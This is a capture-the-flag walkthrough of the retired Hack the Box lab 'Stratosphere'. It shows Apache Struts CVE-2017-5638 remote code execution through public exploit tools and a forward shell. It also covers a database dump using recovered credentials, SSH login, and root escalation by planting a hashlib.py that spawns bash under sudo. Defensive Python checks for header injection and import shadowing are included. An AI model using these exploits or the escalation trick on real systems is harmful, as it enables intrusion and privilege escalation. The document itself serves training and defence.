HTB – Stratosphere

Today we are going to solve another CTF challenge, "Stratosphere", a lab presented by Hack the Box that is available online for those who want to improve their skills in penetration testing and black-box testing. Stratosphere is a retired vulnerable lab; Hack the Box offers a collection of vulnerable labs as challenges, graded from beginner to expert level, so you can practise according to your experience.

Level: Easy

Task: find user.txt and root.txt file in victim’s machine.

WalkThrough

Since these labs are available online, they have static IPs. The IP of Stratosphere is 10.10.10.64.

Let’s start off with scanning the network to find our target.

root@kali:/opt/Struts-Apache-ExploitPack/Exploiter# nmap -sV 10.10.10.64
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-15 15:28 CET
Nmap scan report for 10.10.10.64
Host is up (0.026s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
80/tcp open http
8080/tcp open http-proxy
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.70%I=7%D=1/15%Time=5C3DEE2E%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,786,"HTTP/1\.1\x20200\x20\r\nAccept-Ranges:\x20bytes\r\nETag:\x2
--snip--
SF:-size:12px;}\x20a\x20{color:black;}\x20a\.name\x20{color:black;}\x20\.l
SF:ine\x20{height:1px;background-color:#525D76;border:none;}</style></head
SF:><body>");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.90 seconds

Nmap shows port 80 open for HTTP, so let's explore the target IP in the browser. On port 80 we were greeted by the following page, which gave us no informative clue.

We then visited port 8080 (reported as an HTTP proxy) and found the same web page. We inspected the page source on both ports but found nothing of interest.

Next we ran a directory brute-force attack with DirBuster, using the wordlist "directory-list-2.3-medium.txt".

Luckily it found some web directories, such as /Monitoring; let's explore that in the browser.

When we open http://10.10.10.64:8080/Monitoring, it redirects to http://10.10.10.64:8080/Monitoring/example/Welcome.action for login. I looked closely at the .action extension in the URL and searched for it. The .action extension is used by Apache Struts 2, which has a history of bugs and vulnerabilities; a search for its exploits turns up plenty of Python scripts that can compromise this service.

c:\PENTEST\NMAP>nmap -p80 --script http-vuln-cve2017-5638 --script-args path=/Monitoring/example/Welcome.action 10.10.10.64
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-15 17:40 W. Europe Standard Time
Nmap scan report for 10.10.10.64
Host is up (0.021s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-vuln-cve2017-5638:
|   VULNERABLE:
|   Apache Struts Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-5638
|       Apache Struts 2.3.5 - Struts 2.3.31 and Apache Struts 2.5 - Struts 2.5.10 are vulnerable to a Remote Code Execution
|       vulnerability via the Content-Type header.
|
|     Disclosure date: 2017-03-07
|     References:
|       http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638
|_      https://cwiki.apache.org/confluence/display/WW/S2-045

Nmap done: 1 IP address (1 host up) scanned in 11.06 seconds

We used the above nmap script to confirm that the target is vulnerable. Next we tried the struts-pwn script:
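The nmap output above states the thing a defender needs to know about S2-045 (CVE-2017-5638): the injection arrives in the Content-Type header. A legitimate Content-Type is a media type that follows a narrow grammar (type/subtype plus optional name=value parameters), so a reverse proxy, WAF rule or log check can flag any request whose header is not a well-formed media type or contains OGNL expression markers. The following is an added example, not part of this write-up or of the nmap script; the sample requests are constructed and the finding names are my own.

```python
"""Flag HTTP requests whose Content-Type header is not a well-formed media type.

Added example (not from the write-up). Two checks are applied to each request:
  1. the header contains an OGNL expression marker ("%{" or "${"), which a
     legitimate media type never does, even inside a quoted parameter value;
  2. the header does not match the RFC 7231 media-type grammar at all.
Either finding is enough to drop or alert on the request in front of a Struts 2
application.
"""
import re

# Constructed sample requests (not captured from the lab machine): the raw head
# of an HTTP/1.1 request as a proxy or WAF would see it.
SAMPLE_REQUESTS = [
    "POST /Monitoring/example/Welcome.action HTTP/1.1\r\nHost: 10.10.10.64\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n",
    "POST /Monitoring/example/Welcome.action HTTP/1.1\r\nHost: 10.10.10.64\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk\r\n\r\n",
    # Constructed malformed header with an expression marker; not an exploit payload.
    "POST /Monitoring/example/Welcome.action HTTP/1.1\r\nHost: 10.10.10.64\r\n"
    "Content-Type: %{#constructed_placeholder}.multipart/form-data\r\n\r\n",
]

# RFC 7230 "token" characters; note that "{" and "}" are not among them.
TOKEN = r"[!#$%&'*+.^_`|~0-9A-Za-z-]+"
QUOTED = r'"(?:[^"\\]|\\.)*"'
PARAM = rf"\s*;\s*{TOKEN}=(?:{TOKEN}|{QUOTED})"
MEDIA_TYPE_RE = re.compile(rf"^{TOKEN}/{TOKEN}(?:{PARAM})*\s*$")

OGNL_MARKERS = ("%{", "${")


def header_value(raw_request, name):
    """Return the value of the first header called `name` (case-insensitive), or None."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:
        key, sep, value = line.partition(":")
        if sep and key.strip().lower() == name.lower():
            return value.strip()
    return None


def inspect_content_type(raw_request):
    """Return a list of finding names for the request's Content-Type header."""
    content_type = header_value(raw_request, "Content-Type")
    if content_type is None:
        return []
    findings = []
    if any(marker in content_type for marker in OGNL_MARKERS):
        findings.append("expression-marker")
    if not MEDIA_TYPE_RE.match(content_type):
        findings.append("not-a-media-type")
    return findings


def triage(requests):
    """Run the inspection over a batch of raw requests, one result list per request."""
    return [inspect_content_type(r) for r in requests]


if __name__ == "__main__":
    for request, findings in zip(SAMPLE_REQUESTS, triage(SAMPLE_REQUESTS)):
        print(header_value(request, "Content-Type"), "->", findings or "ok")
```

The grammar check alone would miss a marker hidden inside a quoted parameter value (quoted strings may contain almost anything), which is why the marker check runs separately; the two together cover the header regardless of how the value is wrapped.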

https://github.com/mazen160/struts-pwn/blob/master/struts-pwn.py

c:\Python27>python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c "whoami"

[*] URL: http://10.10.10.64/Monitoring/example/Welcome.action
[*] CMD: whoami
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
Note: Server Connection Closed Prematurely

tomcat8
[%} Done.

c:\Python27>

FwdSh3ll is a tiny open-source, web-payload-oriented exploitation framework for crafting forward shells.

What is a forward shell? Have you ever been in the situation, while looking for an approach to a CTF box, where you discover an RCE vulnerability in a web app but still can't get a reverse shell no matter how hard you try, because outbound traffic is strictly filtered? A forward shell is a scheme for interacting with a shell on a vulnerable Linux machine that is based on the named-pipe mechanism.

root@kali:/opt/FwdSh3ll# python3 FwdSh3ll.py

[FwdSh3ll ASCII-art banner]

{v0.2}
by Sam Freeside (@snovvcrash)
https://github.com/snovvcrash/FwdSh3ll

[*] Loaded 4 payload(s)

[>] Please enter target URL: http://10.10.10.64/Monitoring/example/Welcome.action
[>] Please enter proxies URL (optional):

[?] Which payload you would like to use?

1. ApacheStruts
2. NodejsExpress
3. ShellShock
4. WebShell

[>] Please enter the number of your choice: 1

[?] Would you like to run a single command or get a forward shell?

1. Single command
2. Forward shell

[>] Please enter the number of your choice: 2

############################## FORWARD SHELL MODE #############################

[*] Session path & ID: /dev/shm/fwdshin.45197
[*] Setting up forward shell on target
[*] Setting up read thread
[*] Press CTRL-C to terminate session

FwdSh3ll> whoami
tomcat8

FwdSh3ll> ls
conf
db_connect
lib
logs
policy
webapps
work

FwdSh3ll>

I also found an exploit pack, Struts-Apache-ExploitPack; let's download it from GitHub and make its script executable.

root@kali:/opt# git clone https://github.com/drigg3r/Struts-Apache-ExploitPack.git
Cloning into 'Struts-Apache-ExploitPack'...
remote: Enumerating objects: 41, done.
remote: Total 41 (delta 0), reused 0 (delta 0), pack-reused 41
Unpacking objects: 100% (41/41), done.
root@kali:/opt# cd Struts-Apache-ExploitPack/Exploiter

root@kali:/opt/Struts-Apache-ExploitPack/Exploiter# chmod +x Exploit.sh


Now run the following command to exploit the victim machine.

root@kali:/opt/Struts-Apache-ExploitPack/Exploiter# ./Exploit.sh http://10.10.10.64:8080/Monitoring/example/Welcome.action
Enter Command to execute>ls
conf
db_connect
lib
logs
policy
webapps
work
Enter Command to execute>cat db_connect
[ssn]
user=ssn_admin
pass=AWs64@on*&

[users]
user=admin
pass=admin

Now that we have database credentials, let's use them to dump everything inside the database.

Enter Command to execute>mysqldump -u admin -p admin --all-databases --skip-lock-tables
-- MySQL dump 10.16 Distrib 10.1.26-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost Database: 
-- ------------------------------------------------------
-- Server version 10.1.26-MariaDB-0+deb9u1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Current Database: `users`
--

CREATE DATABASE /*!32312 IF NOT EXISTS*/ `users` /*!40100 DEFAULT CHARACTER SET utf8mb4 */;

USE `users`;

--
-- Table structure for table `accounts`
--

DROP TABLE IF EXISTS `accounts`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `accounts` (
`fullName` varchar(45) DEFAULT NULL,
`password` varchar(30) DEFAULT NULL,
`username` varchar(20) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `accounts`
--

LOCK TABLES `accounts` WRITE;
/*!40000 ALTER TABLE `accounts` DISABLE KEYS */;
INSERT INTO `accounts` VALUES ('Richard F. Smith','9tc*rhKuG5TyXvUJOrE^5CK7k','richard');
/*!40000 ALTER TABLE `accounts` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2019-01-15 9:16:38
Enter Command to execute>
root@kali:/opt/Struts-Apache-ExploitPack/Exploiter# ssh richard@10.10.10.64
The authenticity of host '10.10.10.64 (10.10.10.64)' can't be established.
ECDSA key fingerprint is SHA256:tQZo8j1TeVASPxWyDgqJf8PaDZJV/+LeeBZnjueAW/E.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.64' (ECDSA) to the list of known hosts.
richard@10.10.10.64's password: 
Linux stratosphere 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u2 (2018-02-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Feb 27 16:26:33 2018 from 10.10.14.2
richard@stratosphere:~$ ls
Desktop test.py user.txt
richard@stratosphere:~$ cat user.txt
e61*****36b

richard@stratosphere:~$ sudo -l

Matching Defaults entries for richard on stratosphere:

env_reset, mail_badpass,

secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User richard may run the following commands on stratosphere:
(ALL) NOPASSWD: /usr/bin/python* /home/richard/test.py
richard@stratosphere:~$ echo 'import os;os.system("/bin/bash")' > hashlib.py
richard@stratosphere:~$ sudo /usr/bin/python /home/richard/test.py
root@stratosphere:/home/richard# id
uid=0(root) gid=0(root) groups=0(root)
root@stratosphere:~/Desktop# cd /root
root@stratosphere:~# cat root.txt
d41*****27e
root@stratosphere:~#

Running sudo -l reveals that richard may run /usr/bin/python* /home/richard/test.py as root without a password; however, richard does not have write permission on the script itself. Examining the script shows that it imports hashlib. Because Python puts the directory of the script being run first on its import path, a hashlib.py created in the same directory is imported instead of the real hashlib module and its contents are executed. Therefore I created a hashlib.py in the current directory that calls the system binary /bin/bash, so that when test.py is run via sudo it imports hashlib.py, which spawns a root shell.
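To make the mechanism behind this escalation concrete from the administrator's side, here is an added example (not code from the write-up, and the real test.py is not shown on the page, so a constructed stand-in is used). The static check lists the imports of a sudo-permitted script for which a same-named file already sits beside the script; the dynamic check runs the script with and without Python's -I (isolated) flag, which drops the script directory from sys.path and is the simplest hardening for a sudo rule of this shape.

```python
"""Check a sudo-permitted Python script for standard-library module shadowing.

Added example, not code from the write-up. When Python runs a script, the
script's own directory is placed first on sys.path, so a file named hashlib.py
beside test.py is imported instead of the standard-library module. This script
demonstrates that resolution and shows that `python -I` prevents it.
"""
import ast
import os
import subprocess
import sys
import tempfile

# Constructed stand-in for /home/richard/test.py (the real file is not on the
# page); it only reports where the hashlib module was loaded from.
TARGET_SCRIPT = "import hashlib\nprint(hashlib.__file__)\n"
# Constructed stand-in for a dropped hashlib.py. It is benign: a single marker
# attribute is enough to prove the import was hijacked.
SHADOW_MODULE = "SHADOWED = True\n"


def make_lab(directory):
    """Write the two constructed files into `directory`; return the script path."""
    script = os.path.join(directory, "test.py")
    with open(script, "w") as fh:
        fh.write(TARGET_SCRIPT)
    with open(os.path.join(directory, "hashlib.py"), "w") as fh:
        fh.write(SHADOW_MODULE)
    return script


def shadow_candidates(script):
    """Static check: top-level imports of `script` for which a same-named .py
    file or package directory exists next to the script (and would win)."""
    script_dir = os.path.dirname(os.path.abspath(script))
    with open(script) as fh:
        tree = ast.parse(fh.read())
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(
        name for name in names
        if os.path.isfile(os.path.join(script_dir, name + ".py"))
        or os.path.isdir(os.path.join(script_dir, name))
    )


def is_shadowed(script, isolated=False):
    """Dynamic check: run the script (optionally with -I) and report whether
    hashlib resolved to a file inside the script's own directory."""
    cmd = [sys.executable] + (["-I"] if isolated else []) + [script]
    out = subprocess.run(cmd, capture_output=True, text=True, check=True)
    loaded_from = os.path.dirname(os.path.realpath(out.stdout.strip()))
    return loaded_from == os.path.dirname(os.path.realpath(script))


def demo():
    """Build the lab in a temporary directory and return what each check says."""
    with tempfile.TemporaryDirectory() as tmp:
        script = make_lab(tmp)
        return {
            "candidates": shadow_candidates(script),
            "default_shadowed": is_shadowed(script),
            "isolated_shadowed": is_shadowed(script, isolated=True),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

On a real host, run shadow_candidates against the script named in the sudoers rule and also check who can write to that directory; a home directory owned by the invoking user, as here, means every import in the script is a candidate even before any file is dropped. Writing the rule as /usr/bin/python3 -I /path/to/script (and without the wildcard) removes the script directory from the import path, though a user who can still write to that directory retains other avenues, so the script itself belongs somewhere the user cannot write.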

Author: Jacco Straathof
